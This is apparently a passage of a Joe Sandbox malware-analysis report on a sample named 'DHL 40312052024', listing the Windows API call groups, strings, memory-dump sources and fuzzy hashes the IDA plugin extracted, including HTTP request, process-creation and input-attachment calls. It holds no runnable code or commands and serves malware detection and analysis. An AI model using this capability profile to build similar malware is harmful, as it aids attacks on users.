• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
APIs
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
APIs
• timeGetTime.WINMM ref: 00814F7A
  • Part of subcall function 007D049F: timeGetTime.WINMM(?,75A8B400,007C0E7B), ref: 007D04A3
• Sleep.KERNEL32(0000000A), ref: 00814FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00814FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00814FEC
• SetActiveWindow.USER32 ref: 0081500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00815019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00815038
• Sleep.KERNEL32(000000FA), ref: 00815043
• IsWindow.USER32 ref: 0081504F
• EndDialog.USER32(00000000), ref: 00815060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
  • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
• CoInitialize.OLE32(00000000), ref: 0081D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0081D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0081D691
• CoCreateInstance.OLE32(00842D7C,00000000,00000001,00868C1C,?), ref: 0081D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0081D74C
• CoTaskMemFree.OLE32(?,?), ref: 0081D7A4
• _memset.LIBCMT ref: 0081D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0081D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0081D840
• CoTaskMemFree.OLE32(00000000), ref: 0081D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0081D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0081D880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0080C283
• GetWindowRect.USER32(00000000,?), ref: 0080C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0080C2F3
• GetDlgItem.USER32(?,00000002), ref: 0080C2FE
• GetWindowRect.USER32(00000000,?), ref: 0080C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0080C364
• GetDlgItem.USER32(?,000003E9), ref: 0080C372
• GetWindowRect.USER32(00000000,?), ref: 0080C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0080C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0080C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0080C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0080C3FE
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
• Instruction ID: 22ef11eb4b163419261983df00a5d125b89dd9c65be017c00dd14f276495797f
• Opcode Fuzzy Hash: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
• Instruction Fuzzy Hash: 63514071B00205AFDB18CFA9DD8AAAEBBB6FB98310F14862DF615D72D1D7709D008B50
APIs
  • Part of subcall function 007B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007B2036,?,00000000,?,?,?,?,007B16CB,00000000,?), ref: 007B1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007B20D3
• KillTimer.USER32(-00000001,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007B216E
• DestroyAcceleratorTable.USER32(00000000), ref: 007EBCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBD0A
• DeleteObject.GDI32(00000000), ref: 007EBD1C
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 607875432968c6a584e881717ccb44d7b0955ec62cff03879b4897d2c91061f1
• Instruction ID: 5d885faa8be738b82e8c0c876006aa0180033c8c6e9e44384f9e2786afe052ac
• Opcode Fuzzy Hash: 607875432968c6a584e881717ccb44d7b0955ec62cff03879b4897d2c91061f1
• Instruction Fuzzy Hash: CF61B030612A44DFCB35AF19CD48B6A7BF1FF44312F60842DE1468A576C7B8A882DB91
APIs
  • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
• GetSysColor.USER32(0000000F), ref: 007B21D3
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: df86f4a30c7c02dc49d2b74b3c470a6e45444f440ac889fc8fb79683dc16ad42
• Instruction ID: 31d5b4af7b54e9f2cff7af77d1d79eaf72e1665e4c6722d37142666e02d16b23
• Opcode Fuzzy Hash: df86f4a30c7c02dc49d2b74b3c470a6e45444f440ac889fc8fb79683dc16ad42
• Instruction Fuzzy Hash: 4C419C31402144ABDB255F28EC88BF93B65FB46321F194265FE65CA1E7C7398C42DB61
APIs
• CharLowerBuffW.USER32(?,?,0083F910), ref: 0081A90B
• GetDriveTypeW.KERNEL32(00000061,008689A0,00000061), ref: 0081A9D5
• _wcscpy.LIBCMT ref: 0081A9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 0ed01d820f78b4cf2acc1a3081aa129f7a7bc384fa3efd080e3ac3985871f956
• Instruction ID: b19ba7463f63fcbb83d8aef73e759aae61155ed1a79aae536f14de041461d6b2
• Opcode Fuzzy Hash: 0ed01d820f78b4cf2acc1a3081aa129f7a7bc384fa3efd080e3ac3985871f956
• Instruction Fuzzy Hash: 19518031108301DBC708EF14C896BEFBBA9FF84304F15492DF5A5972A2DB319989CA93
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: 8dd2d261acfaa80ce159299d61fdc7576603ae92bd68a8636cd76ef5ec8708d9
• Instruction ID: 33d8c08e68f7eb9041ed7cc1b0ef2853e0693c7702d4921d52406d2bc68a9bc0
• Opcode Fuzzy Hash: 8dd2d261acfaa80ce159299d61fdc7576603ae92bd68a8636cd76ef5ec8708d9
• Instruction Fuzzy Hash: 5441C371600205EEDB24DF35D846BBA77F9FF49300F2044AEE659D7392EA399942CB11
APIs
• _memset.LIBCMT ref: 0083716A
• CreateMenu.USER32 ref: 00837185
• SetMenu.USER32(?,00000000), ref: 00837194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00837221
• IsMenu.USER32(?), ref: 00837237
• CreatePopupMenu.USER32 ref: 00837241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0083726E
• DrawMenuBar.USER32 ref: 00837276
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: c2108d0bf65dc65194162141600bfb54935f5480a0bace44f8d01dff545c4163
• Instruction ID: f1670820d3158d3f8a3e3542c5deb1de3e094453495de9d030dda2b81362c515
• Opcode Fuzzy Hash: c2108d0bf65dc65194162141600bfb54935f5480a0bace44f8d01dff545c4163
• Instruction Fuzzy Hash: 2B4149B5A01209EFDB20DF64D848F9A7BB5FF88310F144429FA4697361D771E910CB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0083755E
• CreateCompatibleDC.GDI32(00000000), ref: 00837565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00837578
• SelectObject.GDI32(00000000,00000000), ref: 00837580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0083758B
• DeleteDC.GDI32(00000000), ref: 00837594
• GetWindowLongW.USER32(?,000000EC), ref: 0083759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008375B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008375BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 4fcd2e681e8d78d766ae1e17d9ee0e462be6592e6f876d229ad7349569d1f66b
• Instruction ID: fcfc2112f80827f144049bd63cc57f0f8cdd852ab752911f030bd3fca7476a0c
• Opcode Fuzzy Hash: 4fcd2e681e8d78d766ae1e17d9ee0e462be6592e6f876d229ad7349569d1f66b
• Instruction Fuzzy Hash: 3E318B72505215BBDF269F64DC09FEA3B69FF89320F110624FA15E20A1D731D811DBE4
APIs
• _memset.LIBCMT ref: 007D6E3E
  • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
• __gmtime64_s.LIBCMT ref: 007D6ED7
• __gmtime64_s.LIBCMT ref: 007D6F0D
• __gmtime64_s.LIBCMT ref: 007D6F2A
• __allrem.LIBCMT ref: 007D6F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D6F9C
• __allrem.LIBCMT ref: 007D6FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D6FD1
• __allrem.LIBCMT ref: 007D6FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D7006
• __invoke_watson.LIBCMT ref: 007D7077
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: 41f237b75507c53edee99575fa43959d4543712a4c5979bedf5abf15dff16b04
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: AE71E476A00B16EBD718AF69DC45B6AB3B9AF08324F14862BF414D73C1F778D9408B90
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812542
                                                                                    • GetMenuItemInfoW.USER32(00875890,000000FF,00000000,00000030), ref: 008125A3
                                                                                    • SetMenuItemInfoW.USER32(00875890,00000004,00000000,00000030), ref: 008125D9
                                                                                    • Sleep.KERNEL32(000001F4), ref: 008125EB
                                                                                    • GetMenuItemCount.USER32(?), ref: 0081262F
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0081264B
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00812675
                                                                                    • GetMenuItemID.USER32(?,?), ref: 008126BA
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00812700
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812714
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812735
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00836FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00836FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00836FCC
• _memset.LIBCMT ref: 00836FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00836FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00837067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00806BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00806C18
• VariantInit.OLEAUT32(?), ref: 00806C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00806C4A
• VariantCopy.OLEAUT32(?,?), ref: 00806C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00806CB1
• VariantClear.OLEAUT32(?), ref: 00806CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00806CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00806CDC
• VariantClear.OLEAUT32(?), ref: 00806CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00806CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
  • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
• CoInitialize.OLE32 ref: 00828403
• CoUninitialize.OLE32 ref: 0082840E
• CoCreateInstance.OLE32(?,00000000,00000017,00842BEC,?), ref: 0082846E
• IIDFromString.OLE32(?,?), ref: 008284E1
• VariantInit.OLEAUT32(?), ref: 0082857B
• VariantClear.OLEAUT32(?), ref: 008285DC
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00825793
• inet_addr.WSOCK32(?,?,?), ref: 008257D8
• gethostbyname.WSOCK32(?), ref: 008257E4
• IcmpCreateFile.IPHLPAPI ref: 008257F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00825862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00825878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 008258ED
• WSACleanup.WSOCK32 ref: 008258F3
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0081B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0081B546
• GetLastError.KERNEL32 ref: 0081B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0081B5BD
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00809014
• GetDlgCtrlID.USER32 ref: 0080901F
• GetParent.USER32 ref: 0080903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0080903E
• GetDlgCtrlID.USER32(?), ref: 00809047
• GetParent.USER32(?), ref: 00809063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00809066
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008090FD
• GetDlgCtrlID.USER32 ref: 00809108
• GetParent.USER32 ref: 00809124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00809127
• GetDlgCtrlID.USER32(?), ref: 00809130
• GetParent.USER32(?), ref: 0080914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0080914F
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
• GetParent.USER32 ref: 0080916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00809184
• _wcscmp.LIBCMT ref: 00809196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00809211
Strings
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
APIs
• VariantInit.OLEAUT32(?), ref: 008288D7
• CoInitialize.OLE32(00000000), ref: 00828904
• CoUninitialize.OLE32 ref: 0082890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00828A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00828B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00842C0C), ref: 00828B6F
• CoGetObject.OLE32(?,00000000,00842C0C,?), ref: 00828B92
• SetErrorMode.KERNEL32(00000000), ref: 00828BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00828C25
• VariantClear.OLEAUT32(?), ref: 00828C35
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00817A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 008111F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00810268,?,00000001), ref: 00811204
• GetWindowThreadProcessId.USER32(00000000), ref: 0081120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 0081121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0081122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 00811245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00810268,?,00000001), ref: 00811257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 0081129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 008112B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00810268,?,00000001), ref: 008112BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007BFAA6
• OleUninitialize.OLE32(?,00000000), ref: 007BFB45
• UnregisterHotKey.USER32(?), ref: 007BFC9C
• DestroyWindow.USER32(?), ref: 007F45D6
• FreeLibrary.KERNEL32(?), ref: 007F463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 007F4668
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• EnumChildWindows.USER32(?,0080A439), ref: 0080A377
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 007B2EAE
  • Part of subcall function 007B1DB3: GetClientRect.USER32(?,?), ref: 007B1DDC
  • Part of subcall function 007B1DB3: GetWindowRect.USER32(?,?), ref: 007B1E1D
  • Part of subcall function 007B1DB3: ScreenToClient.USER32(?,?), ref: 007B1E45
• GetDC.USER32 ref: 007ECD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ECD45
• SelectObject.GDI32(00000000,00000000), ref: 007ECD53
• SelectObject.GDI32(00000000,00000000), ref: 007ECD68
• ReleaseDC.USER32(?,00000000), ref: 007ECD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ECDFB
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00821A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00821A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00821ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00821AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00821AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00821B10
• InternetCloseHandle.WININET(00000000), ref: 00821B57
  • Part of subcall function 00822483: GetLastError.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 00822498
  • Part of subcall function 00822483: SetEvent.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 008224AD
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0083F910), ref: 00828D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0083F910), ref: 00828D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00828ED6
• SysFreeString.OLEAUT32(?), ref: 00828F00
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 0082F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0082FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0082FA7C
• CloseHandle.KERNEL32(?), ref: 0082FAAB
• CloseHandle.KERNEL32(?), ref: 0082FB22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
